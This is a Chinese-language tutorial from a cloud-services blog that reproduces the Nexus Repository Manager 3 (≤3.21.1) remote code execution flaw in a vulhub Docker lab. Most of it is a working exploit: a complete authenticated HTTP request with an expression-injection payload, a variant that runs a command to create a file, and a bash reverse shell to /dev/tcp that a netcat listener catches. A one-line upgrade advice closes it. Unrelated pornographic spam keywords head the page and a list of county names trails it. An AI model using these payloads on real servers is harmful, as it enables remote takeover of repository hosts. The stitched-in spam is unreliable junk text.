亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

發布時間:2021-12-29 17:49:53 來源:億速云 閱讀:162 作者:柒染 欄目:安全技術

本篇文章給大家分享的是有關如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。

0x00簡介

nexus的全稱是Nexus Repository Manager,是Sonatype公司的一個產品。它是一個強大的倉庫管理器,極大地簡化了內部倉庫的維護和外部倉庫的訪問。

主要用它來搭建公司內部的maven私服。但是它的功能不僅僅是創建maven私有倉庫這么簡單,還可以作為nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有倉庫,功能非常強大。

0x01漏洞概述

在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中,由于某處功能安全處理不當,導致經過授權認證的攻擊者,可以在遠程通過構造惡意的 HTTP 請求,在服務端執行任意惡意代碼,獲取系統權限。此漏洞的利用需要攻擊者具備任意類型的賬號權限

0x02影響版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

0x03環境搭建

1、本次漏洞環境使用vulhub搭建,在有docker環境的虛擬機中下載

git clone https://github.com/vulhub/vulhub.git

2、進入漏洞目錄,執行docker-compose up -d 命令拉取漏洞環境

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

3、看到綠色的done表示拉取成功,在瀏覽器訪問http://your-ip:8081查看頁面

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

0x04漏洞復現

1、首先使用賬號密碼admin/admin登錄后臺

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

2、登錄后使用f12找到cookie復制當前的csrf-Token

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

3、使用burp進行抓包,替換以下數據包,然后把自己的cookie和csrf-Token粘貼上去,然后發包即可看到執行了9*9

POST /service/rest/beta/repositories/go/group HTTP/1.1

Host: 172.16.1.147:8081

Content-Length: 203

X-Requested-With: XMLHttpRequest

X-Nexus-UI: true

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0

NX-ANTI-CSRF-TOKEN: 0.16290768329434402

Content-Type: application/json

Accept: */*

Origin: http://172.16.1.147:8081

Referer: http://172.16.1.147:8081/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: NX-ANTI-CSRF-TOKEN=0.16290768329434402; NXSESSIONID=69d8dc11-45ac-44b6-aa68-65ca1d6b68ff

Connection: close




{

"name": "internal",

"online": true,

"storage": {

"blobStoreName": "default",

"strictContentTypeValidation": true

},

"group": {

"memberNames": ["$\\A{9*9}"]

}

}

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

4、把執行9*9修改為創建一個文件,進入docker中查看創建成功

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

5、執行反彈shell把執行寫入文件的payload修改成反彈shell的命令,使用nc進行監聽,點擊發送查看nc的監聽看到返回了shell

"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/ip/port<&1')}"

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現

0x05修復建議

1、官方已發布新版本修復了該漏洞,建議升級至最新版本

以上就是如何進行Nexus Repository Manager 3遠程命令執行漏洞的復現,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

波密县| 洛浦县| 密云县| 武冈市| 得荣县| 乐都县| 蒲城县| 河东区| 南靖县| 大厂| 澄迈县| 东明县| 满洲里市| 大化| 绥滨县| 汾阳市| 海门市| 钟祥市| 贵定县| 韩城市| 将乐县| 绥滨县| 山西省| 博白县| 保定市| 阳城县| 临沭县| 新龙县| 岑溪市| 左权县| 天峻县| 广灵县| 巴彦县| 班戈县| 洪江市| 汾阳市| 祁东县| 万载县| 香格里拉县| 德昌县| 纳雍县|